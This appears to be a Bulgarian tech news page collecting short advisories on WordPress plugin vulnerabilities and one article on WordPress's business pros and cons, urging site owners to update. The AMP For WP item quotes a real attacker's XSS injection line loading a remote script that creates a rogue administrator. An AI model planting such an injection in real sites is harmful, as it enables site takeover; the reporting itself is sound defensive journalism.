wordpress

  • Хакери се възползват от уязвимости в над 1 млн. WordPress сайта

    Първите атаки срещу три WordPress модула – ThemeGrill Demo Importer, Profile Builder и Duplicator – вече са факт. Засегнатите, според WordFence, сайтове, работещи само с Duplicator, са повече от 1 млн.

    Ако използвате някоя от следните версии на трите модула, ъпдейтнете ги възможно най-скоро:

    • ThemeGrill Demo Importer (версии под 1.6.3) – бъгът в модула позволява не неавтентикирани потребители да се логнат в сайта като администратори и да изтрият цялата му база данни
    • Profile Builder free and Pro (версии под 3.1.1) – уязвимостта дава възможност за неавтентикирани потребители да се логнат в сайта като администратори
    • Duplicator (версии под 1.3.26) – бъгът в плъгина позволява свалянето на произволни файлове от засегнатите сайтове
    Прочетете повече по темата тук

     

    В рубриката Новините накратко подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • WordPress: Плюсове и минуси за бизнеса

    Системите за управление на съдържанието – накратко CMS – се използват за създаване, организиране и споделена обработка на уеб-страници. Тяхното особено предимство е, че редакторите, поддържащи и вмъкващо ново съдържание, не се нуждаят от умения за програмиране. Те удобно могат да правят това и чрез графичния потребителски интерфейс.

    CMS-а с отворен код WordPress е най-популярната система, докато Joomla, Typo3, OpenCMS, DNN, Orchard & Magnolia са по-неразпространени. При такова разнообразие, изборът често е нелесен. Един от най-задаваните ни въпроси, е именно този: дали CMS-и като WordPress са подходящи за комерсиални решения в корпоративния бранш. 

    Кристоф Вендл, софтуерен разработчик и уебдизайнер в Iphos IT Solutions, отговаря на този въпрос с “да“. – “Но само ако WordPress отговаря на изискванията.  Иначе казано, човек трябва да разграничава и претегля ситуацията според зависи. Колегите от Iphos България са събрали няколко аргумента „за“ и „против“ използването на WordPress. Ето част от тях, а пълният текст прочетете тук.

    Аргументи „ЗА“ WordPres:

    Фактът, че WordPress е предпочитаната CMS-системата от големи преприятия от ранга като Coca-Cola или New York Times, може да говори само положително за нея. Ето някои от конкретните предимства, които WordPress носи при внедряване и експлоатацията й за компаниите:

    • Висока ефективност на разходите по имплементацията й
    • Кратки срокове за разработка, бърза възвръщаемост на инвестициите
    • Множество приставки / разширения
    • Удобство

    Аргументи „ПРОТИВ“ WordPress:

    Наред с плюсовете, както всяко нещо, WordPress носи със себе си и минуси, като някои от тях могат да са от решаващо значение за определени бизнеси. Тъй като определени недостатъци могат да доведат до нежелани ситуации едва след известно време, ние Ви съветваме да прецените решението си предварително и да потърсите съвет. Така намалявате вероятността да изгубите от инвестицията си и да се сблъскате с неблагоприятни ситуации, водещи до непредвидени разходи в бъдещ план:

    • Уязвимости в сигурността. Популярността на WordPress е както плюс, така и минус – пробойни в сигурността му биват откривани отново и отново. Това налага редовното му обновление като задължително изискване.
    • Някои важни за бизнеса функции са недостъпни в базисната инсталация. WordPress не винаги притежава основополагащи за предприятията функции като напр. Multisite-Management.
    • Макар и рядко, скъпа доработка

    Материалът е публикуван с любезното съдействие на Iphos България. Пълния текст четете тук.

  • Ъпдейтнете Abandoned Cart за WooCommerce сега

    Уязвимост в безплатната и платена версия на плъгина за WooCommerce Abandoned Cart позволява кражбата на администраторски акаунти в сайтовете, които го използват, съобщават от производителя му Tyche Softwares. Разкритата в средата на февруари пробойна е отстранена и препоръчваме на потребителите му да ъпдейтнат до най-новата версия. Към момента 42% от ползвателите са го направили, коментират от Tyche Softwares.

    По данни на ZDNet с безплатната версия на плъгина работят около 20 000 сайта.

    Как работи уязвимостта

    Засегнатите плъгини се казват Abandoned Cart Lite (безплатна версия) и Abandoned Cart Pro (платена версия).

    Според официалната информация от компанията, уязвимостта позволява на атакуващия да създаде нов потребител с име woouser и имейл в услугата Mailinator (конкретният адрес е [email protected]), който има администраторски права в засегнатия сайт.  Проблемът е открит от потребителка, която е съдействала и за отстраняването му. Подробна техническа информация за самата уязвимост не е предоставена публично от авторите на плъгина с уточнението, че те не искат да разкриват как се осъществяват такива зловредни действия.

    Публикации в други медии твърдят, че пробойната в плъгините се дължи на cross-site scripting (XSS) уязвимости. Добавката за WooCommerce (която е и сред най-популярните платформи за електронна търговия в България) позволява на администраторите на сайтовете да следят кои потребители са започнали да пазаруват, но не са завършили поръчките си. Търговците виждат списък с потребители и добавените от тях в кошницата продукти.

    Според Defiant security хакерите използват полетата в количката на магазина, за да добавят зловреден код в базата данни на сайта. В последствие, когато администраторът влезе, за да провери списъка с незавършени поръчки и стигне до компрометираната такава, кодът се изпълнява и дава администраторски права на хакерите и опитва да инсталира два бекдора.

    Първият работи с цел да създаде горе описания администраторски акаунт.

    Вторият създава списък с използваните от платформата WordPress плъгини на сайта, проследява кой е първият деактивиран от тях и подменят съдържанието му, без да го активират. Новият, заразен „плъгин“ позволява отдалечен достъп до сайта.

    Какво да направите

    1. Проверете списъка си с потребители и потърсете потребителското име Ако има такова, то най-вероятно сайтът ви е компрометиран. Ако имате плъгинг, с който записвате и следите потребителската активност в WordPress, проверете дали с този акаунт са осъществени логини и каква е била дейността му
    2. Ъпдейтнете плъгина си до най-новата версия, за да елиминирате пробойната
  • WPML хакнат от бивш служител

    Един от най-популярните WordPress плъгини за мултиезичност WPML е бил компрометиран от бивш служител. Това става ясно от имейл, разпратен до потребителите на компанията (които са над 600,000 души, според официалния ѝ сайт). В официалното съобщение се казва, че бившият служител е оставил backdoor, преди да напусне компанията. С него той е успял да:

    • Копира имена и мейли на клиенти на WPML
    • Разпратил е мейли до тях
    • Спрял е страницата за поръчка на WPML и е публикувал фалшив блог пост от името на компанията

    Прочетете и: Четири начина служителите да се превърнат в заплаха за бизнеса ви

    WPML хакнат от бивш служител

    Разпратеното фалшиво съобщение е от мним потребител, който твърди, че WPML има „смешни уязвимости в сигурността си, които въпреки всички ъпдейти, позволи два от най-важните ми сайта да бъдат хакнати“, както и че „WPML позволи достъпа до лична информация за хора, които имат минимални способности да програмират.“

    Скрийншот от мейла може да видите по-долу:

    В официалното съобщение на WPML се казва още, че самият плъгин не е компрометиран, а атакуващият не е модифицирал кода му. Не е компрометирана и финансова информация. Има вероятност обаче акаунтите на потребителите да са компрометирани, тъй като атакуващият се е сдобил с имена и имейли – а съветът на компанията към засегнатите е да сменят паролите си.

    WPML е плъгин, който позволява на потребителите да създават сайтове на повече от един език на WordPress.

  • Уязвимост в AMP For WP се експлоатира и позволява превземане на сайтове

    Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

    AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

    Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>

    Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

    „Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

    Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

    Как да се предпазите

    Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.

  • Хакери атакуват сайтове през популярен плъгин за съвместимост с GDPR

    Популярният плъгин WP GDPR Compliance съдържа уязвимост, с която неоторизиран потребител може да получи администраторски права върху сайта. Уязвимостта засяга над 100 хил. базирани на WordPress сайта, които в момента използват плъгина.

    Според Wordfence уязвимостта може да се експлоатира изключително лесно. Достатъчно е злонамерено лице да въведе няколко реда код в онлайн формата на WP GDPR Compliance. С нея потребителите на сайта искат копие от данните си. Изпълнението на кода води до това, че в системата на WordPress може да се създаде нов потребител с администраторски привилегии. Така злонамереното лице може да поеме контрола над сайта.

    „Над 100 хил. сайта, работещи с WordPress и използващи WP GDPR Compliance, са били уязвими на тази атака. Критично важно е всички сайтове, които използват този плъгин, да го обновят възможно най-бързо“, коментират от Wordfence.

    WP GDPR Compliance е много популярен в България и Европа, тъй като дава възможност на фирмите лесно да приведат сайтовете си в съответствие с GDPR. Уязвимостта съществува във версиите на WP GDPR Compliance до 1.4.2.

    В помощните форуми на WordPress са публикувани сигнали от потребители. Те твърдят, че някой инсталира плъгини на сайтовете им. Сигналите датират от средата на октомври, В последствие е установено, че всички хакнати сайтове използват WP GDPR Compliance и именно той е вратичката, през която е получен достъп.

    Съвети за бизнеса

    Ако вашият сайт  използва този плъгин, влезте в администраторския панел на WordPress и обновете до версия 1.4.3, в която уязвимостта е остранена. Алтернативата е да изключите плъгина.

  • Уязвимост в WooCommerce позволява превземането на уебсайтове

    Уязвимост в един от най-популярните WordPress плъгини за електронна търговия позволява да се поеме контрол върху целия сайт. Откриетието е на Саймън Сканъл от RIPS Tech, която разработва софтуер за анализ на PHP код.

    Уязвимостта засяга WooCommerce – популярна в България и по света платформа за онлайн търговия. В момента този плъгин се използва от над 4 млн. активни потребители.

    Какъв е проблемът

    WordPress използва система с различни рангове потребители: Administrator, Editor, Author и т.н. При инсталирането на WooCommerce в системата се създава потребител с ранг Shop Manager. Той има права да променя привилегиите на останалите категории потребители; дори на администратора на сайта.

    Това, разбира се, е опасно. За да предотврати злоупотреби, WooCommerce съдържа ограничителна функция, която забранява на Shop Manager да модифицира администраторския профил.

    Проблемът е, че ако плъгинът бъде спрян или изтрит, тази функция престава да действа. Така в системата на WordPress изведнъж се появява потребител, който има права дa модифицира акаунта на администратора.

    Самият Shop Manager няма възможност да спре WooCommerce. За сметка на това той има достъп до функцията на WooCommerce за изтриване на логове.

    Достъп до целия сайт

    Именно тук Сканъл открива уязвимост. Оказва се, че тази функция позволява на Shop Manager да изтрие woocommerce.php – основният файл, който захранва плъгина. Ако той бъде изтрит, WooCommerce спира да работи и Shop Manager може да редактира профила на администратора и да определя какви права има.

    За да се осъществи успешна атака, нейният автор първо трябва да има достъп до WooCommerce акаунта. Това може да стане чрез фишинг или вътрешен човек от компанията, която притежава сайта. След като разполага с потребителско име и парола за WooCommerce, той може да превземе целия сайт през плъгина.

    Съвети за собственици на онлайн магазини

    Уязвимостта е отстранена във версията WooCommerce 3.4.6. Ако сайтът ви е базиран на WordPress и използвате WooCommerce, обновете плъгина до най-новата версия.

  • Непокрита уязвимост във всички версии на WordPress позволява изпълнението на произволен код

    “Ограничението” при тази уязвимост е, че за да бъде възможно експлоатирането, преди това трябва да се сдобиете с права за четене и запис на медийни файлове. Тоест, за да може злонамерен потребител да се възползва от уязвимостта, той трябва да има права върху системата на минимално ниво “Автор”.

    Какви са последствията?

    Веднъж сдобил се с необходимите права, злонамерен потребител, който е запознат с уязвимостта може да изтрие всеки файл от инсталацията на WordPress. Под заплаха са и файловете на сървъра, върху който процеса PHP има разрешение за изтриване. Атакуващият може също така да изтрие цяла WordPress инсталация и да заобиколи мерките за сигурност, за да изпълни произволен код на сървъра.

    Сред един от файловете, които могат да бъдат изтрити е сърварният конфигурационен файл – .htaccess (който може да съдържа ограничения, свързани със сигурността). Друг важен компонент, с който може да се сдобие атакуващият е съдържанието на wp-config.php (който съдържа идентификационните данни за базата данни). И двата файла са изключително важни за сигурността на инсталацията и достъпа до тях би довел до пълно компрометиране на системата.

    Друг подход, които атакуващият може да предприеме е да изтрие wp-config.php и така да задейства процеса на инсталиране на WordPress при следващото посещение на уебсайта. Това от своя страна ще му позволи да премине през процеса на инсталиране и да създаде администраторски акаунти по свой избор, след което да премине към следващата стъпка по изпълнение на произволен код върху машината.

    Има ли фикс и как можем сами да си помогнем

    Въпреки че в началото на годината от екипа, отговарящ за сигурността на WP беше получено уверение, че проблемът ще бъде отстранен в следващите шест месеца. Проблемът все още е на лице и няма яснота кога ще бъде пусната кръпка.

    Тъй като атаката изисква потребителски акаунт, с уязвимостта не може да бъде злоупотребено масово, с цел компрометиране на произволни WordPress сайтове. Въпреки всичко, ето какви мерки можем да предприемем ако все пак се налага върху системата да работи повече от един потребител с минимум авторска роля.

    Като за начало се уверете, че процесът на PHP разполага само с толкова права, колкото са необходими за безпроблемната работа на сайта. Тоест – прилагайте златното правило за “least privileges”, когато това е възможно

    Също така, като временно решение можете да добавите следния код във файла functions.php, върху темата, която използвате.

    add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );
    
    function rips_unlink_tempfix( $data ) {
    
    if( isset($data['thumb']) ) {
    
    $data['thumb'] = basename($data['thumb']);
    
    }
    
    return $data;
    
    }
    
    

    Това, което прави посочения код е да се “закачи” за функцията ‘wp_update_attachment_metadata’ и да се увери, че данните в променливата ‘thumb’ нямат непозволени стойности, които биха позволили експлоатация през path traversal.

    И не на последно място, винаги използвайте защитна стена с възможност за WAF (Web Application Firewall). Конфигуриран “правилно”, този инструмент може да ви спести доста главоболия.

    Бъдете винаги в крак с новините от света на информационната сигурност – станете наши фенове във Facebook. 

Back to top button
Close
Close